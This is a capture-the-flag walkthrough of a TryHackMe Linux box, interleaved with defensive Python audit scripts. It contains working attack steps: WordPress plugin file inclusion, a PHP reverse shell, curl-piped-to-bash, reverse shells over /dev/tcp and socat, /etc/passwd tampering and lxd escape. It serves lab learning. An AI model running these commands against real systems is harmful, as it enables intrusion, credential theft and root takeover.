
All in One is an easy Linux box on TryHackMe.

Enumeration


Starting off with an nmap scan, I find ports 21, 22 and 80 open.

root@kali:~/tryhackme/allinone# nmap -sC -sV 10.10.166.147
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 15:39 EST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan  
Service scan Timing: About 66.67% done; ETC: 15:39 (0:00:03 remaining)  
Nmap scan report for 10.10.166.147                             
Host is up (0.22s latency).                                         
Not shown: 997 closed ports                                        
PORT   STATE SERVICE VERSION                                       
21/tcp open  ftp     vsftpd 3.0.3                                    
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)            
| ftp-syst:                                                   
|   STAT:                                                           
| FTP server status:                                             
|      Connected to ::ffff:10.2.8.75                               
|      Logged in as ftp                                               
|      TYPE: ASCII                                                     
|      No session bandwidth limit                                    
|      Session timeout in seconds is 300                                
|      Control connection is plain text                               
|      Data connections will be plain text                         
|      At session startup, client count was 4                           
|      vsFTPd 3.0.3 - secure, fast, stable                           
|_End of status                                                          
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                           
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)           
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)               
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)         
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                      
|_http-server-header: Apache/2.4.29 (Ubuntu)                           
|_http-title: Apache2 Ubuntu Default Page: It works                     
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel               
                                                                              
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds

FTP Enumeration

Since FTP allows anonymous access, I log in and start to poke around.

root@kali:~/tryhackme/allinone# ftp 10.10.166.147

Connected to 10.10.166.147.                  
220 (vsFTPd 3.0.3)                          
Name (10.10.166.147:root): anonymous           
331 Please specify the password.            
Password:                               
230 Login successful.               
Remote system type is UNIX.    
Using binary mode to transfer files. 
 
ftp> dir -a                                                           
200 PORT command successful. Consider using PASV.      
150 Here comes the directory listing.                  
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 .  
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 .. 
226 Directory send OK. 

Nothing is located here, so I try to upload a file; however, I am not allowed to do that.

ftp> put new                       
local: new remote: new                              
200 PORT command successful. Consider using PASV. 
553 Could not create file. 

HTTP Enumeration

Moving on to port 80, I run gobuster to look for directories. Here I find /wordpress.

root@kali:~/tryhackme/allinone# gobuster dir -u 10.10.166.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.166.147
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html
[+] Timeout:        10s
===============================================================
2020/12/09 15:39:33 Starting gobuster
===============================================================
/index.html (Status: 200)
/wordpress (Status: 301)

Since /wordpress is open, I can run wpscan to gather more information

root@kali:~/tryhackme/allinone# wpscan --url 10.10.166.147/wordpress                                                                                                                                             
_______________________________________________________________                                         
         __          _______   _____                                                                    
         \ \        / /  __ \ / ____|                                                                   
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                  
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \      
            \  /\  /  | |     ____) | (__| (_| | | | |                        
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                  
                                                                                                        
         WordPress Security Scanner by the WPScan Team               
                         Version 3.7.6            
       Sponsored by Automattic - https://automattic.com/            
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart                       
_______________________________________________________________                
                                                                               
[i] It seems like you have not updated the database for some time.                
[?] Do you want to update now? [Y]es [N]o, default: [N]N                           
[+] URL: http://10.10.166.147/wordpress/                                            
[+] Started: Wed Dec  9 16:54:36 2020                                      
                                                    
Interesting Finding(s):                               

[+] http://10.10.166.147/wordpress/           
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)                                                    
 | Found By: Headers (Passive Detection)
 | Confidence: 100%                                                                                     
                                                    
[+] http://10.10.166.147/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%                                 
 | References:                                      
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API 
 | References:                      
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
                                                    
[+] http://10.10.166.147/wordpress/readme.html                                                          
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%                      
                                                    
[+] Upload directory has listing enabled: http://10.10.166.147/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%              
                                                                                                        
[+] http://10.10.166.147/wordpress/wp-cron.php                                                          
 | Found By: Direct Access (Aggressive Detection)                                                       
 | Confidence: 60%                                                                                      
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299                        
                                                    
[+] WordPress version 5.5.1 identified (Latest, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.166.147/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.166.147/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
                                                    
[+] WordPress theme in use: twentytwenty                                                                
 | Location: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/      
 | Latest Version: 1.5 (up to date)
 | Last Updated: 2020-08-11T00:00:00.000Z                                                               
 | Readme: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/readme.txt                                                                                                                              
 | Style URL: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team                                                                                                                                                                                    
 | Author URI: https://wordpress.org/
 |                                    
 | Found By: Css Style In Homepage (Passive Detection)
 |                    
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
 | Location: http://10.10.166.147/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2019-05-10T16:05:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <====================================================================================================================================> (21 / 21) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed Dec  9 16:54:52 2020

Exploit


Mail-Masta Exploit

Since wpscan found a few plugins, I start looking for exploits for them. Looking at mail-masta, I find one on exploit-db.

[screenshot: etcpasswd]

Looking through this exploit, I find that /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd works against this box, as I can view the file.

[screenshot: etcpasswd]

Since this is working properly, I need to find a file to read that will give me useful information. I find a Medium article detailing how to extract the wp-config file by having PHP base64-encode it first. To do this, I just need to change the link to /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

[screenshot: base64]

This outputs a large base64 value. I take this value and put it in a file named wp-config. I then decode it to properly read the file.

root@kali:~/tryhackme/allinone# cat wp-config | base64 -d

.......................................................

/** MySQL database username */
define( 'DB_USER', 'elyana' );

/** MySQL database password */
define( 'DB_PASSWORD', '*******************' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

.......................................................
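As a defensive counterpart to the two file-inclusion requests above, here is an added example (not from the writeup) that scans Apache access-log lines for the mail-masta count_of_send.php endpoint and flags any pl value that is a PHP stream wrapper, a traversal sequence or an absolute path. The log lines, and the names scan_log and classify_pl, are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log line: only client IP, request target and status are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Values of the 'pl' parameter that mean it is being used as a file path, not a name.
SUSPICIOUS = [
    (re.compile(r'^(php|file|data|expect|zip|phar)://', re.I), "php stream wrapper"),
    (re.compile(r'(^|[\\/])\.\.([\\/]|$)'), "directory traversal"),
    (re.compile(r'^/'), "absolute path"),
]

def classify_pl(value):
    """Return why a 'pl' value looks like file inclusion, or None if it looks benign."""
    v = unquote(unquote(value))  # parse_qs decoded once already; undo double-encoding too
    for pattern, reason in SUSPICIOUS:
        if pattern.search(v):
            return reason
    return None

def scan_log(lines):
    """Flag requests to count_of_send.php whose 'pl' parameter carries a path or wrapper."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/count_of_send.php"):
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("pl", []):
            reason = classify_pl(value)
            if reason:
                flagged.append({"ip": m.group("ip"), "status": int(m.group("status")),
                                "pl": value, "reason": reason})
    return flagged

# Constructed sample: the two requests from the writeup, a percent-encoded traversal,
# a benign-looking value and an unrelated request.
PLUGIN = "/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"
SAMPLE_LOG = [
    '10.2.8.75 - - [09/Dec/2020:16:58:01 -0500] "GET %s?pl=/etc/passwd HTTP/1.1" 200 2421 "-" "Mozilla/5.0"' % PLUGIN,
    '10.2.8.75 - - [09/Dec/2020:16:59:12 -0500] "GET %s?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"' % PLUGIN,
    '10.2.8.75 - - [09/Dec/2020:17:00:00 -0500] "GET %s?pl=%%2e%%2e%%2f%%2e%%2e%%2fetc%%2fhosts HTTP/1.1" 200 300 "-" "curl/7.72"' % PLUGIN,
    '10.2.8.75 - - [09/Dec/2020:17:01:00 -0500] "GET %s?pl=campaign.txt HTTP/1.1" 200 120 "-" "Mozilla/5.0"' % PLUGIN,
    '10.2.8.75 - - [09/Dec/2020:17:02:00 -0500] "GET /wordpress/index.php?p=1 HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%(ip)s %(status)s %(reason)s: pl=%(pl)s" % hit)
```

Feed it a real access log with `scan_log(open("/var/log/apache2/access.log"))` to see which file-inclusion attempts returned 200.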

WordPress Reverse Shell

With this password, I can log in to the WordPress site. Once logged in, I navigate to Appearance > Theme Editor, select 404 Template (404.php) and replace its contents with a PHP reverse shell. If you wish to read more about gaining a reverse shell on WordPress, I recommend this article by Hacking Articles.

[screenshot: theme]

After saving the edited file, I set up a netcat listener. Once the listener is running, I navigate to /wp-content/themes/twentytwenty/404.php to trigger the reverse shell.

root@kali:~/tryhackme/allinone# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.147] 59480
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 22:59:22 up  2:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Privilege Escalation as www-data


Before running any scans, I upgrade the shell to a full TTY with python3.

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-4.4$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/allinone# stty raw -echo
root@kali:~/tryhackme/allinone# fg

bash-4.4$ 

I then run LinEnum.sh and find several ways to escalate my privileges straight to root

bash-4.4$ curl 10.2.8.75/LinEnum.sh | bash 

SUID

The SUID section of LinEnum immediately points out 3 known vulnerable SUID files. I will be using GTFOBins to exploit these.

[screenshot: suid]

Starting off with bash, I look on GTFOBins to find the correct syntax to exploit it.

bash-4.4$ bash -p
bash-4.4# 

Looking at chmod on GTFOBins, I find that it will not drop me a shell, but it does let me change the permissions on any file. You could make root.txt and user.txt readable this way, but I want to gain root access. Instead, I make /etc/passwd writable so I can insert my own password hash.

bash-4.4# chmod 0777 /etc/passwd
bash-4.4# ls -la /etc/passwd
-rwxrwxrwx 1 root root 1672 Oct  6 11:57 /etc/passwd

I need to generate a password hash using openssl to insert into the /etc/passwd file.

root@kali:~/tryhackme/allinone# openssl passwd -1 -salt root password
$1$root$1fvaXuILgb4rdRlHdQ80N/

Now I edit the file and replace the x next to root with the new hash.

bash-4.4$ vi /etc/passwd

root:$1$root$1fvaXuILgb4rdRlHdQ80N/:0:0:root:/root:/bin/bash

After saving this, I can log in as root with the password "password".

bash-4.4$ su root       
Password: 
root@elyana:/# 
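The two conditions that made this work, a world-writable /etc/passwd and a hash sitting in the password field instead of /etc/shadow, are easy to check for on a host. This added audit (my example, not part of the writeup; audit_passwd and SAMPLE_PASSWD are made-up names) parses passwd content together with the file's mode bits and flags both, plus any extra UID 0 account; the sample content is constructed around the modified root line shown above.

```python
import os
import stat

# Constructed /etc/passwd excerpt: the first line is the modified root entry from
# the writeup (hash in field 2), the last is an extra UID 0 account.
SAMPLE_PASSWD = """root:$1$root$1fvaXuILgb4rdRlHdQ80N/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
elyana:x:1000:1000:elyana:/home/elyana:/bin/bash
backdoor:x:0:0::/root:/bin/bash
"""

def audit_passwd(content, mode):
    """Return (subject, issue) findings for passwd text plus the file's st_mode bits."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        # -rwxrwxrwx as in the writeup: anyone can rewrite root's entry
        findings.append(("file", "writable by group or others (mode %o)" % (mode & 0o777)))
    for line in content.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((name, "empty password field (no password needed)"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # A hash here bypasses /etc/shadow and is readable by every user
            findings.append((name, "password hash stored in /etc/passwd"))
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account"))
    return findings

def audit_passwd_file(path="/etc/passwd"):
    """Run the audit against a real file (needs only read access)."""
    with open(path) as f:
        return audit_passwd(f.read(), os.stat(path).st_mode)

if __name__ == "__main__":
    for subject, issue in audit_passwd(SAMPLE_PASSWD, 0o100777):
        print("%s: %s" % (subject, issue))
```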

Cronjob

Looking at the cronjobs, I find that root is running one out of /var/backups/script.sh

[screenshot: cron]

Navigating there, I see I am allowed to edit the file

bash-4.4$ ls -la
total 52
drwxr-xr-x  2 root root  4096 Oct  7 13:41 .
drwxr-xr-x 14 root root  4096 Oct  5 19:43 ..
-rw-r--r--  1 root root 32890 Oct  6 11:57 apt.extended_states.0
-rw-r--r--  1 root root  3570 Oct  5 21:07 apt.extended_states.1.gz
-rwxrwxrwx  1 root root    73 Oct  7 13:37 script.sh

Since I am allowed to edit the file, I insert a bash reverse shell from Pentest Monkey

echo '#!/bin/bash' > script.sh
echo 'bash -i >& /dev/tcp/10.9.2.255/9002 0>&1' >> script.sh

With this edited, I set up a netcat listener and wait a few moments. I then receive a connection and a root shell.

root@kali:~/tryhackme/allinone# nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.147] 58036
bash: cannot set terminal process group (19460): Inappropriate ioctl for device
bash: no job control in this shell
root@elyana:~# 
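The weakness here is a root cron job pointing at a script anyone can write to. As an added example (not from the writeup), the audit below parses system-crontab lines, stats each job's program and reports any that is group- or world-writable or not owned by root; it assumes /etc/crontab style lines with a user field, and the demo recreates the 0777 script.sh in a temporary directory rather than touching the real /var/backups.

```python
import os
import re
import stat
import tempfile

# System-crontab format (assumed): five time fields or @keyword, a user, then the command.
CRON_RE = re.compile(r'^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$')

def cron_commands(crontab_text):
    """Yield (user, program) for each job line, skipping comments and VAR=value lines."""
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_RE.match(line)
        if m:
            yield m.group("user"), m.group("cmd").split()[0]

def audit_cron_target(path, cron_user):
    """Describe why 'path', run by cron as 'cron_user', could be modified by someone else."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return "target missing"
    issues = []
    if st.st_mode & stat.S_IWOTH:
        issues.append("world-writable")
    if st.st_mode & stat.S_IWGRP:
        issues.append("group-writable")
    if cron_user == "root" and st.st_uid != 0:
        issues.append("not owned by root")
    return ", ".join(issues) or None

def audit_crontab(crontab_text):
    """Return {program: issue} for every job whose program is flagged."""
    out = {}
    for user, prog in cron_commands(crontab_text):
        issue = audit_cron_target(prog, user)
        if issue:
            out[prog] = issue
    return out

def demo():
    """Constructed scenario: a 0777 script.sh like the writeup's, beside a 0755 one."""
    d = tempfile.mkdtemp()
    paths = {}
    for name, mode in (("script.sh", 0o777), ("safe.sh", 0o755)):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("#!/bin/bash\necho backup\n")
        os.chmod(p, mode)
        paths[name] = p
    crontab = "PATH=/usr/bin:/bin\n# hourly jobs\n"
    crontab += "0 * * * * root %s\n*/5 * * * * root %s --quiet\n" % (paths["script.sh"], paths["safe.sh"])
    return {os.path.basename(p): issue for p, issue in audit_crontab(crontab).items()}

if __name__ == "__main__":
    for prog, issue in demo().items():
        print("%s: %s" % (prog, issue))
```

On a real host, run `audit_crontab(open("/etc/crontab").read())` (and the files under /etc/cron.d) as the same kind of check.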

Elevating to elyana


Moving backwards, I will work as www-data and try to elevate to elyana.

Reading the hint.txt file on elyana's desktop, I find that the password for this user is stored somewhere on the system.

bash-4.4$ cat hint.txt
Elyana's user password is hidden in the system. Find it ;)

I start looking around for anything useful. Searching for files owned by elyana, I find an interesting result under /etc/.

find / -user elyana -type f 2>/dev/null

This looks promising, so I read the file and find credentials.

bash-4.4$ cat /etc/mysql/conf.d/private.txt
user: elyana
password: *********

Another way of finding this file is running linpeas

[screenshot: pass]

Testing this password, I can log in as elyana.

bash-4.4$ su elyana
Password: 
bash-4.4$ whoami
elyana

Privilege Escalation as elyana


As with www-data, there are several ways to escalate to root as elyana. I will outline a few methods here, rerunning LinEnum.sh to help find them.

Sudo

The first thing I do is run sudo -l to see if I am allowed to run any commands with sudo. Here, I find I can run socat.

bash-4.4$ sudo -l
Matching Defaults entries for elyana on elyana:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User elyana may run the following commands on elyana:
    (ALL) NOPASSWD: /usr/bin/socat

Looking on GTFOBins, I see an easy way to escalate to root. Running this command gives me root access.

bash-4.4$ sudo socat stdin exec:/bin/sh
whoami
root

or use the following and catch it with a netcat listener:

sudo socat tcp-connect:10.9.2.255:9001 exec:bash,pty,stderr,setsid,sigint,sane

lxd

Looking at LinEnum, I find that I am a member of the lxd group.

[screenshot: lxd]

This is a popular privilege escalation, and I will be following this guide to do it.

First, I download the alpine builder and build it on my local machine.

root@kali:~/tryhackme/allinone# git clone  https://github.com/saghul/lxd-alpine-builder.git

Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 31 (delta 0), reused 0 (delta 0), pack-reused 27
Unpacking objects: 100% (31/31), done.

root@kali:~/tryhackme/allinone# cd lxd-alpine-builder/

root@kali:~/tryhackme/allinone/lxd-alpine-builder# ./build-alpine 

Determining the latest release... v3.12
..................................................................................
OK: 8 MiB in 19 packages

Once this is done building, I upload it to the machine and import it

bash-4.4$ wget 10.2.8.75/alpine-v3.12-x86_64-20201209_2120.tar.gz
--2020-12-10 02:23:07--  http://10.2.8.75/alpine-v3.12-x86_64-20201209_2120.tar.gz
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3199386 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20201209_2120.tar.gz’

alpine-v3.12-x86_64 100%[===================>]   3.05M   321KB/s    in 16s     

2020-12-10 02:23:24 (190 KB/s) - ‘alpine-v3.12-x86_64-20201209_2120.tar.gz’ saved [3199386/3199386]

lxc image import ./alpine-v3.12-x86_64-20201209_2120.tar.gz --alias myimage

I want to double-check that it has been imported properly.

bash-4.4$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | fa664dd4e321 | no     | alpine v3.12 (20201209_21:20) | x86_64 | 3.05MB | Dec 10, 2020 at 2:23am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+

The image was imported properly, so I can now create a privileged container from it, mount the host filesystem into it, and exec into it to gain root access.

bash-4.4$ lxc init myimage ignite -c security.privileged=true
Creating ignite

bash-4.4$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite

bash-4.4$ lxc start ignite

bash-4.4$ lxc exec ignite /bin/sh

~ # whoami
root

Finally, user.txt and root.txt are base64 encoded; decode them and submit your flags 🚩🚩!

This was a fun box, to be honest, and it covers some of the most important ways of exploiting a system.
